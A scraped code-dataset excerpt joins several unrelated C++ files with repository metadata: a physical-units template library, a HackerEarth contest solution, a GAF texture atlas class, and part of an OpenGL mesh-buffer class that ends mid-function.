std::ratio_add<T1, T2>, std::ratio_add<A1, A2>> (lhs.getValue()*rhs.getValue(), internal::BaseQuantity() ); } template <typename M, typename L, typename T, typename A> constexpr RQuantity<M, L, T, A> operator*(const double& lhs, const RQuantity<M, L, T, A>& rhs) { return RQuantity<M, L, T, A>(lhs*rhs.getValue(), internal::BaseQuantity() ); } template <typename M1, typename L1, typename T1, typename A1, typename M2, typename L2, typename T2, typename A2> constexpr RQuantity<std::ratio_subtract<M1, M2>, std::ratio_subtract<L1, L2>, std::ratio_subtract<T1, T2>, std::ratio_subtract<A1, A2>> operator/(const RQuantity<M1, L1, T1, A1>& lhs, const RQuantity<M2, L2, T2, A2>& rhs) { return RQuantity<std::ratio_subtract<M1, M2>, std::ratio_subtract<L1, L2>, std::ratio_subtract<T1, T2>, std::ratio_subtract<A1, A2>> (lhs.getValue() / rhs.getValue(), internal::BaseQuantity() ); } template <typename M, typename L, typename T, typename A> constexpr RQuantity<std::ratio_subtract<std::ratio<0>, M>, std::ratio_subtract<std::ratio<0>, L>, std::ratio_subtract<std::ratio<0>, T>, std::ratio_subtract<std::ratio<0>, A>> operator/(double x, const RQuantity<M, L, T, A>& rhs) { return RQuantity<std::ratio_subtract<std::ratio<0>, M>, std::ratio_subtract<std::ratio<0>, L>, std::ratio_subtract<std::ratio<0>, T>, std::ratio_subtract<std::ratio<0>, A>> (x / rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr RQuantity<M, L, T, A> operator/(const RQuantity<M, L, T, A>& rhs, double x) { return RQuantity<M, L, T, A>(rhs.getValue() / x, internal::BaseQuantity() ); } // Comparison operators for quantities: // ------------------------------------ template <typename M, typename L, typename T, typename A> constexpr bool operator==(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue() == rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr bool operator!=(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue() != rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr bool operator<=(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue() <= rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr bool operator>=(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue() >= rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr bool operator< (const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue()<rhs.getValue()); } template <typename M, typename L, typename T, typename A> constexpr bool operator> (const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return (lhs.getValue()>rhs.getValue()); } } // end namespace internal // Predefined (physical unit) quantity types: // ------------------------------------------ #define QUANTITY_TYPE(_Mdim, _Ldim, _Tdim, _Adim, name) \ typedef internal::RQuantity<std::ratio<_Mdim>, std::ratio<_Ldim>, std::ratio<_Tdim>, std::ratio<_Adim>> name; // Replacement of "double" type QUANTITY_TYPE(0, 0, 0, 0, Number); // Physical quantity types QUANTITY_TYPE(1, 0, 0, 0, QMass); QUANTITY_TYPE(0, 1, 0, 0, QLength); QUANTITY_TYPE(0, 2, 0, 0, QArea); QUANTITY_TYPE(0, 3, 0, 0, QVolume); QUANTITY_TYPE(0, 0, 1, 0, QTime); QUANTITY_TYPE(0, 1, -1, 0, QSpeed); QUANTITY_TYPE(0, 1, -2, 0, QAcceleration); QUANTITY_TYPE(0, 1, -3, 0, QJerk); QUANTITY_TYPE(0, 0, -1, 0, QFrequency); QUANTITY_TYPE(1, 1, -2, 0, QForce); QUANTITY_TYPE(1, -1, -2, 0, QPressure); // QAngle type: QUANTITY_TYPE(0, 0, 0, 1, QAngle); // Predefined units: // ----------------- // Predefined mass units: constexpr QMass Kg(1.0, internal::BaseQuantity()); // SI base unit constexpr QMass Gramme = 0.001 * Kg; constexpr QMass Tonne = 1000 * Kg; constexpr QMass Ounce = 0.028349523125 * Kg; constexpr QMass Pound = 16 * Ounce; constexpr QMass Stone = 14 * Pound; // Predefined length-derived units constexpr QLength Metre(1.0, internal::BaseQuantity()); // SI base unit constexpr QLength Decimetre = Metre / 10; constexpr QLength Centimetre = Metre / 100; constexpr QLength Millimetre = Metre / 1000; constexpr QLength Kilometre = 1000 * Metre; constexpr QLength Inch = 2.54 * Centimetre; constexpr QLength Foot = 12 * Inch; constexpr QLength Yard = 3 * Foot; constexpr QLength Mile = 5280 * Foot; constexpr QArea Kilometre2 = Kilometre*Kilometre; constexpr QArea Metre2 = Metre*Metre; constexpr QArea Decimetre2 = Decimetre*Decimetre; constexpr QArea Centimetre2 = Centimetre*Centimetre; constexpr QArea Millimetre2 = Millimetre * Millimetre; constexpr QArea Inch2 = Inch*Inch; constexpr QArea Foot2 = Foot*Foot; constexpr QArea Mile2 = Mile*Mile; constexpr QVolume Kilometre3 = Kilometre2*Kilometre; constexpr QVolume Metre3 = Metre2*Metre; constexpr QVolume Decimetre3 = Decimetre2*Decimetre; constexpr QVolume Litre = Decimetre3; constexpr QVolume Centimetre3 = Centimetre2*Centimetre; constexpr QVolume Millimetre3 = Millimetre2 * Millimetre; constexpr QVolume Inch3 = Inch2*Inch; constexpr QVolume Foot3 = Foot2*Foot; constexpr QVolume Mile3 = Mile2*Mile; // Predefined time-derived units: constexpr QTime Second(1.0, internal::BaseQuantity()); // SI base unit constexpr QTime Minute = 60 * Second; constexpr QTime Hour = 60 * Minute; constexpr QTime Day = 24 * Hour; constexpr QFrequency Hz(1.0, internal::BaseQuantity()); // Predefined mixed units: constexpr QAcceleration G = 9.80665 * Metre / (Second*Second); constexpr QForce Newton(1.0, internal::BaseQuantity()); constexpr QForce Poundforce = Pound*G; constexpr QForce Kilopond = Kg*G; constexpr QPressure Pascal(1.0, internal::BaseQuantity()); constexpr QPressure Bar = 100000 * Pascal; constexpr QPressure Psi = Pound*G / Inch2; // Physical unit literals: // ----------------------- // literals for length units constexpr QLength operator"" _mm(long double x) { return static_cast<double>(x)*Millimetre; } constexpr QLength operator"" _cm(long double x) { return static_cast<double>(x)*Centimetre; } constexpr QLength operator"" _m(long double x) { return static_cast<double>(x)*Metre; } constexpr QLength operator"" _km(long double x) { return static_cast<double>(x)*Kilometre; } constexpr QLength operator"" _mi(long double x) { return static_cast<double>(x)*Mile; } constexpr QLength operator"" _yd(long double x) { return static_cast<double>(x)*Yard; } constexpr QLength operator"" _ft(long double x) { return static_cast<double>(x)*Foot; } constexpr QLength operator"" _in(long double x) { return static_cast<double>(x)*Inch; } constexpr QLength operator"" _mm(unsigned long long int x) { return static_cast<double>(x)*Millimetre; } constexpr QLength operator"" _cm(unsigned long long int x) { return static_cast<double>(x)*Centimetre; } constexpr QLength operator"" _m(unsigned long long int x) { return static_cast<double>(x)*Metre; } constexpr QLength operator"" _km(unsigned long long int x) { return static_cast<double>(x)*Kilometre; } constexpr QLength operator"" _mi(unsigned long long int x) { return static_cast<double>(x)*Mile; } constexpr QLength operator"" _yd(unsigned long long int x) { return static_cast<double>(x)*Yard; } constexpr QLength operator"" _ft(unsigned long long int x) { return static_cast<double>(x)*Foot; } constexpr QLength operator"" _in(unsigned long long int x) { return static_cast<double>(x)*Inch; } // literals for speed units constexpr QSpeed operator"" _mps(long double x) { return QSpeed(x, internal::BaseQuantity()); } constexpr QSpeed operator"" _miph(long double x) { return static_cast<double>(x)*Mile / Hour; } constexpr QSpeed operator"" _kmph(long double x) { return static_cast<double>(x)*Kilometre / Hour; } constexpr QSpeed operator"" _mps(unsigned long long int x) { return QSpeed(static_cast<long double>(x), internal::BaseQuantity()); } constexpr QSpeed operator"" _miph(unsigned long long int x) { return static_cast<double>(x)*Mile / Hour; } constexpr QSpeed operator"" _kmph(unsigned long long int x) { return static_cast<double>(x)*Kilometre / Hour; } // literal for frequency unit constexpr QFrequency operator"" _Hz(long double x) { return QFrequency(x, internal::BaseQuantity()); } constexpr QFrequency operator"" _Hz(unsigned long long int x) { return QFrequency(static_cast<long double>(x), internal::BaseQuantity()); } // literals for time units constexpr QTime operator"" _s(long double x) { return QTime(x, internal::BaseQuantity()); } constexpr QTime operator"" _min(long double x) { return static_cast<double>(x)*Minute; } constexpr QTime operator"" _h(long double x) { return static_cast<double>(x)*Hour; } constexpr QTime operator"" _day(long double x) { return static_cast<double>(x)*Day; } constexpr QTime operator"" _s(unsigned long long int x) { return QTime(static_cast<double>(x), internal::BaseQuantity()); } constexpr QTime operator"" _min(unsigned long long int x) { return static_cast<double>(x)*Minute; } constexpr QTime operator"" _h(unsigned long long int x) { return static_cast<double>(x)*Hour; } constexpr QTime operator"" _day(unsigned long long int x) { return static_cast<double>(x)*Day; } // literals for mass units constexpr QMass operator"" _kg(long double x) { return QMass(x, internal::BaseQuantity()); } constexpr QMass operator"" _g(long double x) { return static_cast<double>(x)*Gramme; } constexpr QMass operator"" _t(long double x) { return static_cast<double>(x)*Tonne; } constexpr QMass operator"" _oz(long double x) { return static_cast<double>(x)*Ounce; } constexpr QMass operator"" _lb(long double x) { return static_cast<double>(x)*Pound; } constexpr QMass operator"" _st(long double x) { return static_cast<double>(x)*Stone; } constexpr QMass operator"" _kg(unsigned long long int x) { return QMass(static_cast<double>(x), internal::BaseQuantity()); } constexpr QMass operator"" _g(unsigned long long int x) { return static_cast<double>(x)*Gramme; } constexpr QMass operator"" _t(unsigned long long int x) { return static_cast<double>(x)*Tonne; } constexpr QMass operator"" _oz(unsigned long long int x) { return static_cast<double>(x)*Ounce; } constexpr QMass operator"" _lb(unsigned long long int x) { return static_cast<double>(x)*Pound; } constexpr QMass operator"" _st(unsigned long long int x) { return static_cast<double>(x)*Stone; } // literals for acceleration units constexpr QAcceleration operator"" _mps2(long double x) { return QAcceleration(x, internal::BaseQuantity()); } constexpr QAcceleration operator"" _mps2(unsigned long long int x) { return QAcceleration(static_cast<double>(x), internal::BaseQuantity()); } constexpr QAcceleration operator"" _G(long double x) { return static_cast<double>(x)*G; } constexpr QAcceleration operator"" _G(unsigned long long int x) { return static_cast<double>(x)*G; } // literals for force units constexpr QForce operator"" _N(long double x) { return QForce(x, internal::BaseQuantity()); } constexpr QForce operator"" _N(unsigned long long int x) { return QForce(static_cast<double>(x), internal::BaseQuantity()); } constexpr QForce operator"" _lbf(long double x) { return static_cast<double>(x)*Poundforce; } constexpr QForce operator"" _lbf(unsigned long long int x) { return static_cast<double>(x)*Poundforce; } constexpr QForce operator"" _kp(long double x) { return static_cast<double>(x)*Kilopond; } constexpr QForce operator"" _kp(unsigned long long int x) { return static_cast<double>(x)*Kilopond; } // literals for pressure units constexpr QPressure operator"" _Pa(long double x) { return QPressure(x, internal::BaseQuantity()); } constexpr QPressure operator"" _Pa(unsigned long long int x) { return QPressure(static_cast<double>(x), internal::BaseQuantity()); } constexpr QPressure operator"" _bar(long double x) { return static_cast<double>(x)*Bar; } constexpr QPressure operator"" _bar(unsigned long long int x) { return static_cast<double>(x)*Bar; } constexpr QPressure operator"" _psi(long double x) { return static_cast<double>(x)*Psi; } constexpr QPressure operator"" _psi(unsigned long long int x) { return static_cast<double>(x)*Psi; } // Angular unit literals: // ---------------------- constexpr QAngle Radian(1.0, internal::BaseQuantity()); constexpr QAngle operator"" _pi(long double x) { return static_cast<double>(x) * 3.1415926535897932384626433832795 * Radian; } constexpr QAngle operator"" _pi(unsigned long long int x) { return (static_cast<double>(x) * 3.1415926535897932384626433832795) * Radian; } // Predefined angle units: constexpr QAngle Degree = (2.0_pi / 360.0); // literals for angle units constexpr QAngle operator"" _rad(long double x) { return QAngle(x, internal::BaseQuantity()); } constexpr QAngle operator"" _rad(unsigned long long int x) { return QAngle(static_cast<double>(x), internal::BaseQuantity()); } constexpr QAngle operator"" _deg(long double x) { return static_cast<double>(x)*Degree; } constexpr QAngle operator"" _deg(unsigned long long int x) { return static_cast<double>(x)*Degree; } // Conversion macro, which utilizes the string literals #define ConvertTo(_x, _y) (_x).Convert(1.0_##_y) // Typesafe mathematical operations: // --------------------------------- template <typename M, typename L, typename T, typename A> constexpr internal::RQuantity<std::ratio_divide<M, std::ratio<2>>, std::ratio_divide<L, std::ratio<2>>, std::ratio_divide<T, std::ratio<2>>, std::ratio_divide<A, std::ratio<2>>> Qsqrt(const internal::RQuantity<M, L, T, A>& num) { return internal::RQuantity<std::ratio_divide<M, std::ratio<2>>, std::ratio_divide<L, std::ratio<2>>, std::ratio_divide<T, std::ratio<2>>, std::ratio_divide<A, std::ratio<2>>> (sqrt(num.getValue())); } // Typesafe trigonometric operations inline double sin(const QAngle &num) { return std::sin(num.getValue()); } inline double cos(const QAngle &num) { return std::cos(num.getValue()); } inline double tan(const QAngle &num) { return std::tan(num.getValue()); } } // end namespace Units
63fa3bbb26d5948432441443fc9bd9f36b359e82
3b99ca8f666baf8dae54b35471b9932153db3b26
/hacker_earth/Mark_The_Answer.cpp
b31105e170cca7656e36e868da6b93876a92d933
[]
no_license
govardhan100/Hackerearth
38cd2006c48bf0dde2d7c43b34db65ff1f31aaaf
63b69302ca76048e5a1de4972c07f8fbfd4b3589
refs/heads/master
2021-01-19T17:54:17.418973
2017-09-19T14:55:20
2017-09-19T14:55:20
101,095,615
0
0
null
null
null
null
UTF-8
C++
false
false
331
cpp
Mark_The_Answer.cpp
#include<iostream> using namespace std; int main() { int *A=new int[100000],N,X; cin>>N>>X; int temp=0; while(temp!=N){cin>>A[temp];temp++;} int count=0; temp=0; int var=0; while(temp!=N){ if(count==2){break;} if(A[temp]<=X){var++;} if(A[temp]>X){count++;} temp++; } cout<<var<<endl; return 0; }
42b3124e9cade8741a0fcc1ec2903979e7552ad4
6a4ff2103eed6ba0a6341dd3ae0b7ed8e92bcb76
/Library/Sources/GAFTextureAtlasElement.cpp
e7e47401303c22cc06549c17f17282296bed3e45
[]
no_license
rontgen/Cocos2dxGAFPlayer
205c65b2d5523856c25ab57932142349a9a9cba1
0d5ee800d8c80e89e364a9101877f17e4ebc5998
refs/heads/release-gaf-5
2021-01-18T11:25:52.048723
2015-07-10T08:50:52
2015-07-10T08:50:52
49,653,822
3
0
null
2016-01-14T14:56:20
2016-01-14T14:56:20
null
UTF-8
C++
false
false
424
cpp
GAFTextureAtlasElement.cpp
#include "GAFPrecompiled.h" #include "GAFTextureAtlasElement.h" NS_GAF_BEGIN GAFTextureAtlasElement::GAFTextureAtlasElement() : rotation(GAFRotation::NONE) , name("") { } void GAFTextureAtlasElement::setScale(float s) { scale = scaleX = scaleY = s; } void GAFTextureAtlasElement::setScaleX(float s) { scale = scaleX = s; } void GAFTextureAtlasElement::setScaleY(float s) { scale = scaleY = s; } NS_GAF_END
c57bfe19440632a770382dfb9a099acfe3af7f47
568fe892b85f2185536090261a3e9d8318bb78df
/1_Hierarchical/graphics/Graphics/GLObject.cpp
da5ead3646374dd78b05b9acbe80bc97dfcdcd9f
[]
no_license
mariojulio-digipen/MJEngine
e5201204f9e79d8340d4364fe170f3fb90f64932
cc6d5a734bcf45e67df538af413dc81986561138
refs/heads/master
2021-01-11T19:57:13.855877
2017-03-30T03:06:51
2017-03-30T03:06:51
79,429,806
0
1
null
2017-03-30T03:06:51
2017-01-19T08:00:19
C++
WINDOWS-1252
C++
false
false
19,960
cpp
GLObject.cpp
#include "GLObject.h" #include "Transform.h" #include "RenderManager.h" #include "Camera3D.h" #include "Render3D.h" #include <gtc\matrix_transform.hpp> #include <gtc\type_ptr.hpp> #include <gtx\euler_angles.hpp> #include <glm.hpp> extern RenderManager* renderManager; void GLObject::ResizeVaosNumber(int sections) { vao.resize(sections, 0); } void GLObject::CreateBuffersFromFBX() { this->Sections = 1; CreateBuffers(); } void GLObject::CreateBuffers() { if (this->DrawAnimMesh) VBOsNumber = 6; if (this->DrawBone) VBOsNumber = 4; int sections = vao.size(); glGenVertexArrays(sections, &vao[0]); vbosPerSection.resize(sections); for (size_t i = 0; i < vbosPerSection.size(); i++) { vbosPerSection[i].resize(VBOsNumber, 0); glGenBuffers(VBOsNumber, &vbosPerSection[i][0]); } glGenVertexArrays(1, &lineVAO); glGenBuffers(1, &lineVBO); glGenVertexArrays(1, &dotVAO); glGenBuffers(1, &dotVBO); if (Name == "Cloth") // c'mon!! ¬¬' .... { glGenVertexArrays(1, &clothVAO); glGenBuffers(1, &clothVBO_V); glGenBuffers(1, &clothVBO_T); glGenBuffers(1, &clothVBO_N); } } void GLObject::deleteBuffers() { int sections = vao.size(); glDeleteVertexArrays(sections, &vao[0]); vao.clear(); for (size_t i = 0; i < vbosPerSection.size(); i++) { glDeleteBuffers(VBOsNumber, &vbosPerSection[i][0]); vbosPerSection[i].clear(); } vbosPerSection.clear(); glDeleteVertexArrays(1, &lineVAO); glDeleteBuffers(1, &lineVBO); // glDeleteVertexArrays(1, &dotVAO); glDeleteBuffers(1, &dotVBO); glDeleteVertexArrays(1, &clothVAO); glDeleteBuffers(1, &clothVBO_V); glDeleteBuffers(1, &clothVBO_T); glDeleteBuffers(1, &clothVBO_N); } void GLObject::UseVAO(GLuint vaoId) { glBindVertexArray(vao[vaoId]); } void GLObject::BuildVBOsFromFBX(int vboIndex, VBO_TYPE vboType) { // TODO: optimize the VBOs from FBX... } VertexData GLObject::GetAnimationMeshData(VBO_TYPE dataType) { VertexData returnData; // vector iterator is ok since often, there are no more than 2 animation meshes std::vector<Mesh> animMeshes = FModel->GetAnimationObject()->AnimationMeshes; std::vector<Mesh>::iterator animMeshIt = animMeshes.begin(); while (animMeshIt != animMeshes.end()) { Mesh* pMesh = &(*animMeshIt); std::string mName = pMesh->GetName(); if (mName == this->Name) { switch (dataType) { case VERTEX: returnData.dataArray = pMesh->GetVertexData().dataArray; //int debugNumberData1 = pMesh->GetVertexData().dataArray.size() / 3; returnData.numberOfData = pMesh->GetVertexData().numberOfData; returnData.type = VBO_TYPE::VERTEX; break; case UV: returnData.dataArray = pMesh->GetUVData().dataArray; //int debugNumberData2 = pMesh->GetUVData().dataArray.size() / 2; returnData.numberOfData = pMesh->GetUVData().numberOfData; returnData.type = VBO_TYPE::UV; break; case NORMAL: returnData.dataArray = pMesh->GetVertexData().dataArray; //int debugNumberData3 = pMesh->GetVertexData().dataArray.size() / 3; returnData.numberOfData = pMesh->GetVertexData().numberOfData; returnData.type = VBO_TYPE::NORMAL; break; case TANGENT: break; case BONEID: returnData.dataIArray = pMesh->GetBonesIDs().dataArrayI; returnData.numberOfData = pMesh->GetBonesIDs().numberOfData; returnData.type = VBO_TYPE::BONEID; break; case BONEWEIGHT: returnData.dataArray = pMesh->GetBonesWeight().dataArray; returnData.numberOfData = pMesh->GetBonesWeight().numberOfData; returnData.type = VBO_TYPE::BONEWEIGHT; break; case MAX_TYPES: break; default: break; } } animMeshIt++; } return returnData; } VertexData GLObject::GetBoneMeshData(VBO_TYPE dataType) { VertexData returnData; if (FModel == NULL) return returnData; std::unordered_map<std::string, Bone>::iterator meshDataIt = FModel->GetAnimationObject()->BonesMapByName.find(this->Name.c_str()); if (meshDataIt != FModel->GetAnimationObject()->BonesMapByName.end()) { Bone* pBone = &meshDataIt->second; switch (dataType) { case VBO_TYPE::VERTEX: { returnData.dataArray = pBone->MeshData.coordData; returnData.numberOfData = pBone->MeshData.coordData.size() / 3; returnData.type = VBO_TYPE::VERTEX; break; } case VBO_TYPE::UV: { returnData.dataArray = pBone->MeshData.textureData; returnData.numberOfData = pBone->MeshData.textureData.size() / 2; returnData.type = VBO_TYPE::UV; break; } case VBO_TYPE::NORMAL: { returnData.dataArray = pBone->MeshData.normalData; returnData.numberOfData = pBone->MeshData.normalData.size() / 3; returnData.type = VBO_TYPE::NORMAL; break; } case VBO_TYPE::TANGENT: { returnData.dataArray = pBone->MeshData.tangentData; returnData.numberOfData = pBone->MeshData.tangentData.size() / 3; returnData.type = VBO_TYPE::TANGENT; break; } default: break; } } return returnData; } VertexData GLObject::GetFBXMeshData(VBO_TYPE dataType) { // TODO // I think this whole routine is too slow // gotta need to optimize it later VertexData returnData; //std::unordered_map<const char*, std::vector<VertexData>> meshData = FModel->NodesMeshData; std::unordered_map<std::string, std::vector<VertexData>>::iterator meshDataIt = FModel->NodesMeshData.find(this->Name.c_str()); if (meshDataIt != FModel->NodesMeshData.end()) { std::vector<VertexData> tmpV = meshDataIt->second; for (VertexData data : tmpV) { if (data.type == dataType) returnData = data; } } else std::cout << "No MeshData returned!! Careful!!!" << std::endl; return returnData; } void GLObject::BuildVBOsFromOBJ(int vboIndex, VBO_TYPE vboType, GLObject* cloneGLObj) { std::string name = Name; if (Name == "Cloth") std::cout << ""; int sectionCounter = 0; std::vector<int> vertexPerSection = this->VertexPerSection; std::vector<GLuint>::iterator vaoIt = vao.begin(); while (vaoIt != vao.end()) { glBindVertexArray((*vaoIt)); if (DrawAnimMesh) { if (vboType == BONEID) { glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { BoneIDsData = GetAnimationMeshData(vboType); int sizeInBytes = (vertexPerSection[sectionCounter] * 4) * sizeof(int); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 4; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &BoneIDsData.dataIArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribIPointer(vboIndex, 4, GL_INT, 0, 0); Shader->BoneIdAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } } if (vboType == BONEWEIGHT) { glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { BoneWeightData = GetAnimationMeshData(vboType); int sizeInBytes = (vertexPerSection[sectionCounter] * 4) * sizeof(float); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 4; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &BoneWeightData.dataArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribPointer(vboIndex, 4, GL_INT, GL_FALSE, 0, 0); Shader->BoneWeightAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } } } if (vboType == VERTEX) { if (Name == "FMeshPart") printf(""); glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { if(Model != NULL) // is obj? VertxData = *Model->GetVertexData(); else { if (DrawAnimMesh) { VertxData = GetAnimationMeshData(vboType); } else { if (!DrawBone) // is a simple fbx mesh? { VertxData = GetFBXMeshData(vboType); } else { VertxData = GetBoneMeshData(vboType); } } } } else VertxData = cloneGLObj->VertxData; int sizeInBytes = (vertexPerSection[sectionCounter]*3) * sizeof(float); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 3; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &VertxData.dataArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribPointer(vboIndex, 3, GL_FLOAT, GL_FALSE, 0, 0); Shader->VertexAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } if (vboType == UV) { glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { if (Model != NULL) // is obj? TextureData = *Model->GetTexturesData(); else { if (DrawAnimMesh) { TextureData = GetAnimationMeshData(vboType); } else { if (!DrawBone) // is a simple fbx mesh? { TextureData = GetFBXMeshData(vboType); } else { TextureData = GetBoneMeshData(vboType); } } } } else TextureData = cloneGLObj->TextureData; int sizeInBytes = (vertexPerSection[sectionCounter]*2) * sizeof(float); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 2; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &TextureData.dataArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribPointer(vboIndex, 2, GL_FLOAT, GL_FALSE, 0, 0); Shader->TextureAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } if (vboType == NORMAL) { if (Name == "Hips") { std::cout << ""; } VertexData tmp; if (DrawAnimMesh) { tmp = GetAnimationMeshData(vboType); if (tmp.numberOfData == 0) { std::cout << "No Normal data for object " << Name << std::endl; sectionCounter++; vaoIt = vaoIt + 1; continue; } } else { if (DrawBone && !BoneHandMade) { tmp = GetBoneMeshData(vboType); if (tmp.numberOfData == 0) { std::cout << "No Normal data for object " << Name << std::endl; sectionCounter++; vaoIt = vaoIt + 1; continue; } } } glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { if (Model != NULL) // is obj? NormalData = *Model->GetNormalsData(); else { if (!DrawAnimMesh) { if (!DrawBone) // is a simple fbx mesh? { NormalData = GetFBXMeshData(vboType); } else { NormalData = tmp; } } else { NormalData = tmp; } } } else NormalData = cloneGLObj->NormalData; int sizeInBytes = (vertexPerSection[sectionCounter]*3) * sizeof(float); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 3; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &NormalData.dataArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribPointer(vboIndex, 3, GL_FLOAT, GL_FALSE, 0, 0); Shader->NormalAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } if (vboType == TANGENT) { VertexData tmp; if (Type == R3D) { tmp = GetBoneMeshData(vboType); if (tmp.numberOfData == 0) { //std::cout << "No Tangent data for object " << Name << std::endl; sectionCounter++; vaoIt = vaoIt + 1; continue; } } glBindBuffer(GL_ARRAY_BUFFER, vbosPerSection[sectionCounter][vboIndex]); if (cloneGLObj == NULL) // is an initial object? { if (Model != NULL) // is obj? TangentData = *Model->GetTangentsData(); else { if (!DrawBone) // is a simple fbx mesh? { TangentData = GetFBXMeshData(vboType); } else { TangentData = tmp; } } } else TangentData = cloneGLObj->TangentData; int sizeInBytes = (vertexPerSection[sectionCounter] * 3) * sizeof(float); int start = 0; if (sectionCounter > 0) for (int i = 0; i < sectionCounter; i++) start = start + vertexPerSection[i] * 3; glBufferData(GL_ARRAY_BUFFER, sizeInBytes, &TangentData.dataArray[start], GL_STATIC_DRAW); glEnableVertexAttribArray(vboIndex); glVertexAttribPointer(vboIndex, 3, GL_FLOAT, GL_FALSE, 0, 0); Shader->TangetAttLocation = vboIndex; sectionCounter++; vaoIt = vaoIt + 1; continue; } } // hack, fix this... if (DrawBone || this->Name == "Plane") fillLineBuffers(); if (this->Name == "Plane") fillDotBuffers(); } void GLObject::fillLineBuffers() { // store line connector info if bone std::vector<float> points(6); points[0] = -0.0f; points[1] = +0.0f; points[2] = +0.0f; points[3] = +1.0f; points[4] = +1.0f; points[5] = +1.0f; glBindVertexArray(lineVAO); glBindBuffer(GL_ARRAY_BUFFER, lineVBO); glBufferData(GL_ARRAY_BUFFER, 2 * 3 * sizeof(float), &points[0], GL_STATIC_DRAW); glEnableVertexAttribArray(Shader->VertexAttLocation); glVertexAttribPointer(Shader->VertexAttLocation, 3, GL_FLOAT, GL_FALSE, 0, 0); } void GLObject::fillDotBuffers() { std::vector<float> points(3); points[0] = 0.0f; points[1] = 0.0f; points[2] = 0.0f; glBindVertexArray(dotVAO); glBindBuffer(GL_ARRAY_BUFFER, dotVBO); glBufferData(GL_ARRAY_BUFFER, 3 * sizeof(float), &points[0], GL_STATIC_DRAW); glEnableVertexAttribArray(Shader->VertexAttLocation); glVertexAttribPointer(Shader->VertexAttLocation, 3, GL_FLOAT, GL_FALSE, 0, 0); } void GLObject::Update() { for (int i = 0; i < Sections; i++) { UseVAO(i); if (ExtraTextures.size() > 0) Shader->HasExtraTextures(true); else Shader->HasExtraTextures(false); Shader->IsExtraActive(false); Name; if (Textures.size() == 1) { Shader->ChooseTextureUnit(0, "textureSampler"); Textures[0]->Use(); } else if (Textures.size() > 1) { // This "if" statement is an example of texture blending // I need to figure out how to modularize this feature, // but for now, let's make blending occure here. /*if (i == 0 && Name == "Snaky") { Shader->IsExtraActive(true); Shader->ChooseTextureUnit(1, "extraSampler1"); UseTexture(ExtraTextures[0]->GetId()); } Shader->ChooseTextureUnit(0, "textureSampler"); UseTexture(TexturesIdsToDraw[i]);*/ } else { if (!IsScenePoint) { Shader->SetDebugModeOn(); glLineWidth(3); glDrawArrays(GL_LINES, 0, SizeOfDataBySection[i]); Shader->SetDebugModeOff(); continue; } else { int isDot = 1; GLint isdotLoc = glGetUniformLocation(Shader->GetProgramID(), "IsDot"); glUniform1i(isdotLoc, isDot); glPointSize(10.0f); glDrawArrays(GL_POINTS, 0, SizeOfDataBySection[i]); // if point, always 1 vertex isDot = 0; isdotLoc = glGetUniformLocation(Shader->GetProgramID(), "IsDot"); glUniform1i(isdotLoc, isDot); continue; } } if (DebugMode) { glLineWidth(6.0f); int loc = glGetUniformLocation(Shader->GetProgramID(), "DebugMode"); glUniform1i(loc, 1); glPolygonMode(GL_FRONT_AND_BACK, GL_LINE); glDrawArrays(GL_TRIANGLES, 0, SizeOfDataBySection[i]); glLineWidth(1.0f); loc = glGetUniformLocation(Shader->GetProgramID(), "DebugMode"); glUniform1i(loc, 0); glPolygonMode(GL_FRONT_AND_BACK, GL_FILL); glDrawArrays(GL_TRIANGLES, 0, SizeOfDataBySection[i]); } else { if (IsSelected) { int loc = glGetUniformLocation(Shader->GetProgramID(), "Selected"); glUniform1i(loc, 1); } else { int loc = glGetUniformLocation(Shader->GetProgramID(), "Selected"); glUniform1i(loc, 0); } 